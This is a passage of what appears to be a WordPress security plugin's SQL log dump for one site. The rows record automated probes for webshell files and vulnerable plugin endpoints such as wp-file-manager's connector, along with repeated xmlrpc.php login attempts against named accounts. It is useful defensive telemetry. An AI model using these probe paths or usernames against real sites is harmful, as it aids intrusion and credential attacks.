qvtjQA','','707|0|0|0|cmdev-site1.com/ty.php',0,707,0),('95.216.148.85',1608029269,'',0,1680475978.1764,55,'5FP19CNsxkfYmU2WK6qvtjQA','','19|0|0|0|cmdev-site1.com/ty.php',0,19,0),('95.216.148.85',1608029269,'',0,1680475974.6869,55,'ThtxPpfiWcQzUlvAmVqH7Rdj','','19|0|0|0|cmdev-site1.com/wp-includes/ty.php',0,19,0),('159.223.49.95',2682204511,'',0,1680471026.5513,55,'ezTu2gmZwKBSG4DpnW6vo3bF','','19|0|0|0|cmdev-site1.com//wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php',0,19,0),('159.223.49.95',2682204511,'',0,1680471025.6736,55,'SWfskhZMJaFzmIrLAndbuDoT','','19|0|0|0|cmdev-site1.com//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('159.223.49.95',2682204511,'',0,1680471024.8175,55,'6B1Yz4kQpgOFs0wSCo2cUxmf','','19|0|0|0|cmdev-site1.com//wp-content/king.php',0,19,0),('159.223.49.95',2682204511,'',0,1680471024.0043,18,'oVyWgdLSPUx3jaCEw2r6ncsG','','13|0|0|0|cmdev-site1.com//wp-content/x.php',0,13,0),('108.167.56.152',1822898328,'TechSpt',1,1680455741.8227,5,'gZGCH54nYQyhW6NuwIvExm0K','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,1),('108.167.56.152',1822898328,'',1,1680455741.8199,22,'gZGCH54nYQyhW6NuwIvExm0K','','0|0|0|0|cmdev-site1.com/the-wild-hunt/',0,0,1),('159.223.49.95',2682204511,'',0,1680471022.7805,55,'6sLKOIv25Z49VYJe8RPtFH0u','','19|0|0|0|cmdev-site1.com//abruzi.php4',0,19,0),('159.223.49.95',2682204511,'',0,1680471020.8831,55,'FoWSJ3KPNgEmxTcf1Z2iwOHe','','19|0|0|0|cmdev-site1.com//wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php',0,19,0),('159.223.49.95',2682204511,'',0,1680471018.9897,55,'yVQIjCmdtfAYGpe37cohHP64','','19|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/a57bze8931.php',0,19,0),('159.223.49.95',2682204511,'',0,1680471018.0526,10,'uLatgr4vyM3BQF7ZD06eISkw','','707|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/apikey.php',0,707,0),('159.223.49.95',2682204511,'',0,1680471018.0504,56,'uLatgr4vyM3BQF7ZD06eISkw','','51|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/apikey.php',0,51,0),('159.223.49.95',2682204511,'',0,1680471017.0832,55,'JYAaXKgC2Rm1vhi0FuNk9rTe','','19|0|0|0|cmdev-site1.com//wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php',0,19,0),('194.38.23.179',3257276339,'',0,1680514649.8847,10,'4TUYk8yVl3EsX0n2WPGfNaOz','','707|0|0|0|cmdev-site1.com/assets/admin/global/plugins/jQuery-File-Upload/server/php/index.php',0,707,0),('194.38.23.179',3257276339,'',0,1680514649.8756,55,'4TUYk8yVl3EsX0n2WPGfNaOz','','19|0|0|0|cmdev-site1.com/assets/admin/global/plugins/jQuery-File-Upload/server/php/index.php',0,19,0),('194.113.235.169',3262245801,'',0,1680511191.1440,55,'ZXqGjBIOSpRuWz382QTJdvFo','','19|0|0|0|cmdev-site1.com/1.php',0,19,0),('194.38.23.179',3257276339,'',0,1680513700.3491,55,'Ae4Flk5wUcIpVdmhoOHsNDMG','','19|0|0|0|cmdev-site1.com/admin/assets/plugins/jQuery-File-Upload/server/php/index.php',0,19,0),('159.223.49.95',2682204511,'',0,1680547241.4369,55,'lnTIH2efSqmM17YBrNhCZ85K','','19|0|0|0|cmdev-site1.com/administrator/index.php',0,19,0),('108.167.56.152',1822898328,'TechSpt',1,1680562744.1591,5,'gDIUCceSYnx098KzWjiTkHEo','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,1),('67.198.116.43',1137079339,'Melissa',0,1680612416.8484,7,'rZQfoutOAJx8pw7SelGy4jVU','','40|0|0|0|cmdev-site1.com/wp-admin/admin-ajax.php',0,40,0),('67.198.116.43',1137079339,'Melissa',0,1680612416.7739,7,'X8954gPn6wHvr1StiDKZBkpG','','40|0|0|0|cmdev-site1.com/wp-admin/admin-ajax.php',0,40,0),('213.152.161.69',3583549765,'techspt',0,1680675477.8172,152,'NrfYHyeOibGDEIov7g4skF6h','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('217.64.127.195',3644882883,'techspt',0,1680679453.1078,152,'3iM2AJZ91SP6zlkU08XBpago','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('146.70.76.43',2454080555,'techspt',0,1680711222.8831,152,'3dZiFcG1OlbA0SpB8nwxKQD7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.187.235',3583556587,'techspt',0,1680708240.1059,152,'EpQXYZSL3g8jW6bkFcAMIe0C','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.69',3583549765,'techspt',0,1680706917.2799,152,'NXcylVk6tbn1mpDhLuEU02C8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.207.57.115',1540307315,'techspt',0,1680791158.8797,152,'ghtQbyMDJqavorL3ZlFHUAGm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('20.40.54.253',338179837,'',0,1680800502.1516,55,'cuonVe3T17QN4zHxRKvg9bdt','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('20.40.54.253',338179837,'',0,1680800501.8559,55,'v3AdyhKSVeM0ZgX5ca8Ttnoi','','19|0|0|0|cmdev-site1.com/wp-plain.php',0,19,0),('213.152.187.195',3583556547,'techspt',0,1680815761.3263,152,'MlBAewsiJC9mWoypZuYL5bFx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.231.84.41',1541887017,'techspt',0,1680816342.6335,152,'mzR6nDBQWawGqpgIJxjXAfYK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.60',3326602044,'melissa',0,1680842776.7389,152,'3SKPLUj0p5ANHqvm4RsX1JTZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.179.190.218',1739833050,'melissa',0,1680842775.7403,152,'fxcYHRP24FNKSW6vrIG9luMg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.187.251.91',3267099483,'techspt',0,1680842586.3118,152,'aYXqjb0z9MGlOSPTFWonvNCH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('146.70.76.43',2454080555,'techspt',0,1680883143.3546,152,'iKm4YyWj3Nw0EkOBuQCzL2ar','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.163',2249438115,'techspt',0,1680882581.7603,152,'qCorvBfpJ6lKNGDmA7MzULQ9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.21.239.153',1091956633,'melissa',0,1680880623.4972,152,'cIf4CdPiZD6BsHSgaK1M3w5u','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('139.162.104.127',2342676607,'melissa',0,1680880619.2814,152,'NYActHC4nU8yfLsVjpFRwM35','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.91',1540107867,'melissa',0,1680880617.1896,152,'cXPQaYTpmdf5ojqv8VZEACnr','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('124.6.63.132',2080784260,'melissa',0,1680880607.2441,152,'2eXN7IY8fRK1nzWuV6T9ZjSp','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('173.231.231.50',2917656370,'melissa',0,1680880606.7446,152,'mqEUp2Zwo5yOKSeMaF4ldriG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('116.118.51.5',1953903365,'melissa',0,1680880606.0881,152,'kiJeMHnAdQtaK1LGrjoC250w','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('216.128.130.149',3632300693,'melissa',0,1680880590.6817,152,'7HjD98A02WBhgV6bt1KxzGYl','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.54.114.123',3325457019,'melissa',0,1680880587.9934,152,'z4AXSg5bnCOo7i6rQVNDxJdm','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'melissa',0,1680877677.6960,152,'4IBwEMJf1Cz2sx9qFVeLhWg6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1680877672.7771,152,'jaW63PSFTm5siUJ2qCwNDIlO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.95.136.51',576686131,'melissa',0,1680877670.9898,152,'JcakXqMF2fYiz7yxQohDPLEV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'melissa',0,1680877661.7662,152,'d05eIGjEHyN6FzguKil3UnRf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.60',3326602044,'',0,1680877660.3195,10,'o8sWGbU6VnBExFvTaZCyjwmS','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('198.71.235.60',3326602044,'melissa',0,1680877660.3148,152,'o8sWGbU6VnBExFvTaZCyjwmS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.60',3326602044,'melissa',0,1680877656.9987,152,'J5BfX9ZFQmVWhNG0pkDnytiS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'melissa',0,1680877651.0465,152,'trOKoczxUW26LZDAJi8Q0hnu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1680877645.6657,152,'6Y10OLU5cr8bWIyf9QxdjCRT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('163.172.168.158',2746001566,'melissa',0,1680875989.4817,152,'7UlPyKsODk4w25eNYdJIazCf','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.233.85.167',3270071719,'melissa',0,1680875986.0992,152,'HOhiDl4xvB2MWP5tIJSVGRu9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('81.181.130.56',1370849848,'melissa',0,1680875983.8028,152,'92ku04zRKvZG6AVrptCSLDBi','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.24.100.136',2417517704,'melissa',0,1680875977.1143,152,'oxBpXYlb4nqOtwWfHNdGcvTZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.178.95.118',867327862,'melissa',0,1680875975.5235,152,'o3IlbNSY4mV67GFLrKyUJh5M','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1680875965.8296,152,'k8o9FdMyvO0IcrsBRz2Tu3Hb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('3.231.146.243',65508083,'melissa',0,1680875959.4773,152,'BE2CvgmVU7cnFRTzOkSL9lIr','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.77.175.167',760065959,'melissa',0,1680875955.6194,152,'MJ1B7uHck4SnCL5N6YjQgqsD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('161.97.96.198',2707513542,'melissa',0,1680875958.5034,152,'Pfa3bBVUroFNt7RZE2nuMmjx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.187.251.115',3267099507,'techspt',0,1680875044.0762,152,'ghq3I6yCZjHUFRtNbTAYnEJX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.98.102.179',2372036275,'techspt',0,1680873795.0038,152,'eutcJHl9Lg2IkDj1TsdGVK6Q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.211',3091979731,'techspt',0,1680874727.6010,152,'3JVuz9eIMgQyYUZ5OixwsHk1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.156.174.115',3114053235,'techspt',0,1680872977.9327,152,'GbS6rdBt5xqHVhwCDYFevW7a','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.79.177.175',860860847,'melissa',0,1680877644.2104,152,'74NVUvn9gSFKRZb6isTW85zr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.42.179.59',1076540219,'techspt',0,1680876364.4859,152,'wBCnXtPjLWQKSlE0HcORr12M','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.95.34.230',2371822310,'melissa',0,1680876008.4969,152,'mNfB8xCPwiWH70IbZTUeAS1u','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.3.152.100',520329316,'techspt',0,1680883363.8036,152,'Dax4JgOWHZneIL01d59Vc6wX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.190',1152553406,'melissa',0,1680894924.4778,152,'Gy5U8ho1wfaDM3q0uYEJXBrR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.187.220',3583556572,'techspt',0,1680915857.5337,152,'pMxaOHX9CVetYF0ig4KQNBfq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.211',2249438163,'techspt',0,1680916164.7673,152,'dXWit8z1Q0sFuDgLC4lwOTMa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.57.218',1255160282,'melissa',0,1680941393.6809,152,'mS86HP7KRq1WOtJFIv2M3BQu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.191.76.155',1740590235,'melissa',0,1680941367.5292,152,'paovJ2TjZDVmdXyFAPh1QOci','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1680941366.7958,152,'uvM3RkqcKjGZn91LbVxfyErI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.9.227.178',1728701362,'melissa',0,1680941365.9236,152,'vbWaX9Ht76gnwSfQMxezCiRo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1680941358.5887,152,'rMpK0cxLQ6g2JktGAaWu1mSl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.187.215',3583556567,'techspt',0,1680944470.3330,152,'kKRFr94ysMB01qeJmn3uQiSN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.77.231.194',860743618,'melissa',0,1680945096.7031,152,'jWOpHM7bIxi9wvm4FaJqToPB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'Melissa',0,1680957638.6082,7,'Ih3uKs6SgF5C2GJZykNDYPXH','','40|0|0|0|cmdev-site1.com/wp-admin/admin-ajax.php',0,40,0),('54.38.242.51',908522035,'melissa',0,1680967997.9177,152,'hVl6nuk5CmFBD1jUrwAxp4vE','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('210.65.139.75',3527510859,'',0,1680967994.3341,10,'trkOvIUFwEShqBnbyofL215P','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('210.65.139.75',3527510859,'melissa',0,1680967994.3305,152,'trkOvIUFwEShqBnbyofL215P','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('210.65.139.75',3527510859,'melissa',0,1680967985.2846,152,'irfNk9q7MsZCYWvoAcKwLHIF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('146.70.115.219',2454090715,'techspt',0,1680967664.6806,152,'o4UfurM9eFxBOwacEmKCRNsA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.154',1046910106,'techspt',0,1680967273.9339,152,'sULERCH9mZxr7tFSzAwc4Bg1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1680972634.8635,152,'GsJQchIU2LFP4Bu8ZYDmS7A3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.200.116.203',3116922059,'techspt',0,1680971908.8981,152,'WZiz8sTa3lRXrhfAnmQg1Cbo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.19.137.116',773032308,'techspt',0,1681040870.2726,152,'dg8P2fZrFWREatVIiu7GSxLw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('147.78.47.249',2471374841,'',0,1681040318.9325,55,'kBOjmtT17vy65ciHpI9EPQZN','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('184.75.221.211',3091979731,'techspt',0,1681040293.6315,152,'VqHfYdDaxhBnOyemUMSpkK4C','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.10',3583549706,'techspt',0,1681039184.5496,152,'l6SJUnH8t0Q5XNMyVIGA3P9j','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.22.249.133',85391749,'melissa',0,1681031253.4683,152,'S819GYJXiTbpaZhHmCKlgc7d','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.24.100.136',2417517704,'melissa',0,1681031252.6637,152,'p3MSomX06F5UznrZgjCvIcY7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.134.248.211',1535572179,'melissa',0,1681031252.5677,152,'b9FmXASPYq7fl01tVGdTcpZh','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.152.161.30',3583549726,'techspt',0,1681030132.4078,152,'nCidMb4KeYV5ZIGEqmfR6lOp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.79.248',1738035192,'melissa',0,1681029647.6708,152,'A801aqdS5lysKNFE6hcwetpV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.140.29.143',143400335,'',0,1681029642.8338,10,'QBGgv9Lnl1NUMbxy0YPAthOf','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('8.140.29.143',143400335,'melissa',0,1681029642.8257,152,'QBGgv9Lnl1NUMbxy0YPAthOf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'melissa',0,1681029641.6699,152,'gJxeMmuQ1ZrA04SFD9lsz37a','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1681029637.3773,152,'9hvlkQs6bcjNxOC7uMWD5A4U','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.96.211',3098042579,'melissa',0,1681029633.2902,152,'URT9wOuy1YgWBAdCxoPhkQF5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.90.148.14',3562705934,'melissa',0,1681029631.4685,152,'j49SVUgMsCR7dFLDviOGT8Jt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.42.111.218',1546285018,'melissa',0,1681029625.9532,152,'jmvqYVEZW0xfu6JXhcI3sMO7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1681029622.5784,152,'PwmilF01WJgXVzDQE7aGjIKN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.140.29.143',143400335,'melissa',0,1681029617.9946,152,'cwMxbPoTW3vusOQnKVJUGZDz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.179',2249438131,'techspt',0,1681028391.3031,152,'klynE2pGQI1HwLhARUvTJ5NO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.223.195',3091980227,'techspt',0,1681028186.3460,152,'EGNU7ild5AmIDqZgQkR3VbHS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.183.216.163',783800483,'techspt',0,1681027982.4426,152,'tHDufg3pWLdFZByCvwk1mX5K','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'melissa',0,1681026247.4024,152,'2EQTHOYNRvl54homcryM8Aap','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('81.181.130.56',1370849848,'melissa',0,1681026245.0734,152,'uNDt9bKEVZ20lMJo64ymkXiO','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('161.97.96.198',2707513542,'melissa',0,1681026234.7663,152,'zOA0dlyqwP7SKkZbsgVUEi41','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('184.168.98.254',3098043134,'melissa',0,1681026224.0869,152,'R6OCjgDJQ0eAZU3ly4BbM5Pz','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('139.162.104.127',2342676607,'melissa',0,1681026222.0473,152,'31HsyeFVD8a6CQokAlnqM4Eu','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1681026219.0732,152,'VIuUqGXE25oMymOzt8FWShg3','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.59.206.66',3258699330,'melissa',0,1681026219.0730,152,'dUREfVuOBWJMnHbFAjkD76T3','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.162.228.171',765650091,'techspt',0,1681025551.1079,152,'ceB8a71t2Np4rivz6MKGwWER','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.104',3583550056,'techspt',0,1681025274.5417,152,'ByZbIiE1a3eKPpXftcNAqCUM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.183.106.3',3115805187,'techspt',0,1681024630.1949,152,'q1JuLOzagfoBvNMsP6KRlXIY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.187',1046910139,'techspt',0,1681023951.9987,152,'woBy152M4UJftXsDRGN3hYv7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('84.39.116.180',1411871924,'techspt',0,1681023010.4605,152,'EqeQ6VfDZdU2FcLH4Rk1jAOK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.102.27.171',1382423467,'',0,1681022521.7451,71,'bv6wWnglIHs3CAduJLihxfzo','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('82.102.27.171',1382423467,'',0,1681022406.0719,10,'CKdfHXyr78lm0bUoBGVTQAvs','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('82.102.27.171',1382423467,'techspt',0,1681022406.0687,152,'CKdfHXyr78lm0bUoBGVTQAvs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.102.27.171',1382423467,'techspt',0,1681022390.4814,152,'JFzexLrBgf1OmPEYcNkHh0Aj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.181',3583550133,'techspt',0,1681021519.7510,152,'lMbhRz7nBFudxJSA4c31X9Pj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.162.74',3583550026,'techspt',0,1681019655.3589,152,'TpIVJhi9AUf8ZCYLPao3wQNc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('195.206.105.203',3285084619,'',0,1681019111.0869,10,'l2XYEWcV0pFUNT5afDxAeQhH','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('195.206.105.203',3285084619,'techspt',0,1681019111.0842,152,'l2XYEWcV0pFUNT5afDxAeQhH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('195.206.105.203',3285084619,'techspt',0,1681019110.5508,152,'9kx8u5JeB6K174vLSrqVTNFf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.118',3583549814,'techspt',0,1681019015.1476,152,'PSfZyplk2hUDnr0CqMEac6YX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.65.72.143',2671855759,'melissa',0,1681017630.1356,152,'JwjcKBmT3dOafFUIznMHut2y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('142.93.223.16',2388516624,'melissa',0,1681017611.0456,152,'8OnaVHZ4TSJzNo3dsFqAKCQg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.95.136.51',576686131,'melissa',0,1681017603.3863,152,'nd0Tx9EHASzGywc76if3RCVg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.139.1.249',1737163257,'melissa',0,1681017593.4861,152,'7IwzeYj2yJW5U3LsHn0fDQVa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.71.186',2682210234,'',0,1681017592.7639,10,'wRzvuEaUy0XYmqPbMorIcpOs','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('159.223.71.186',2682210234,'melissa',0,1681017592.7593,152,'wRzvuEaUy0XYmqPbMorIcpOs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.93.124',2682215804,'melissa',0,1681017591.7696,152,'WAX54yYtxB9dgmCDIJriu12f','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.71.186',2682210234,'melissa',0,1681017584.6312,152,'CDlT6Aj7KHW23LYhOtc9vewn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.60',3326602044,'melissa',0,1681017584.1678,152,'hk3Uw6F50YI47sXLuHjcy8MO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.214.169.69',1540794693,'',0,1681017229.8176,10,'zGUf0xsuOdN8IXJEeK6RhyMa','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('91.214.169.69',1540794693,'techspt',0,1681017229.8117,152,'zGUf0xsuOdN8IXJEeK6RhyMa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.214.169.69',1540794693,'techspt',0,1681017224.8814,152,'U3oQApwB7kSdK5zfq9IPbYme','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.249',3583549945,'techspt',0,1681038974.8767,152,'QWF4gaJvO8pRq1NcIPwelSYy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.162.204.238',2997013742,'techspt',0,1681038817.9663,152,'D9FePJfZWcihatdLMbmoBNG2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.36.120.166',220493990,'melissa',0,1681037279.0003,152,'En5KwzIUhRVy9aHrvOdcNX8s','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('138.68.45.151',2319723927,'melissa',0,1681037278.7691,152,'rYSl2ef5OdVpvHEDX1qJtciT','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('162.255.118.204',2734651084,'melissa',0,1681037265.4628,152,'DeUtxzFQZ4XWC2yRHb6Tqohg','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.68.47.117',3158585205,'melissa',0,1681037259.8970,152,'gsrT7yqetnAZ4JvHlUDC0IMN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.17.155',1556943259,'melissa',0,1681037255.2710,152,'xAaRruT91BULYsXQeIq7SkcH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.33.63',804397375,'melissa',0,1681037246.6001,152,'hv2BOoVQqCKdlLku57jRbZa8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.231.174.129',585608833,'melissa',0,1681037237.9848,152,'tnOZLslAJg4GVq31XmpbzCiF','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.197.19',908510483,'melissa',0,1681037236.3206,152,'tldipf1eUrxIARFQW4BPHvn8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('114.215.93.65',1926716737,'melissa',0,1681037235.4638,152,'1HIbDL26ko9uKE047glN5BSU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.152.187.195',3583556547,'techspt',0,1681037130.5753,152,'iykjUR0DsM1LmF647bfGg9c2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.219',3583549915,'techspt',0,1681035736.4501,152,'3NoXGFHktT8Jb6LfC1pVj42i','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.52',2487806004,'melissa',0,1681035375.1642,152,'Ljp1qFszCv7itdUGJTm0EK3R','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'melissa',0,1681035367.6938,152,'yq9Kae3AFu2vjYnolwVQdkhU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.170.40.175',1336551599,'melissa',0,1681035362.2660,152,'J